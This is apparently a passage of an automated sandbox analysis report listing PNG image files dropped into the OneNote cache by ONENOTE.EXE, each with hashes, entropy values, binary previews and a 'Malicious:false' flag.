                                                                                                                                                                                                                  SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                                                                                                  SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003T.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13030
                                                                                                                                                                                                                  Entropy (8bit):7.948664903731204
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                                                                                                  MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                                                                                                  SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                                                                                                  SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                                                                                                  SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003U.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3879
                                                                                                                                                                                                                  Entropy (8bit):7.9281351307465044
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                                                                                                  MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                                                                                                  SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                                                                                                  SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                                                                                                  SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003V.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13084
                                                                                                                                                                                                                  Entropy (8bit):7.940058639272698
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                                                                                                  MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                                                                                                  SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                                                                                                  SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                                                                                                  SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000040.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):7374
                                                                                                                                                                                                                  Entropy (8bit):7.955141875077912
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                                                                                                  MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                                                                                                  SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                                                                                                  SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                                                                                                  SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000041.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2210
                                                                                                                                                                                                                  Entropy (8bit):7.86853667196985
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                                                                                                  MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                                                                                                  SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                                                                                                  SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                                                                                                  SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000042.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4847
                                                                                                                                                                                                                  Entropy (8bit):7.950192613458318
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                                                                                                  MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                                                                                                  SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                                                                                                  SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                                                                                                  SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000043.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000044.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000045.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000046.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2232
                                                                                                                                                                                                                  Entropy (8bit):7.837610270261933
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                                                                                                  MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                                                                                                  SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                                                                                                  SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                                                                                                  SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000047.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):19235
                                                                                                                                                                                                                  Entropy (8bit):7.944867159042578
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                                                                                                  MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                                                                                                  SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                                                                                                  SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                                                                                                  SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000048.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
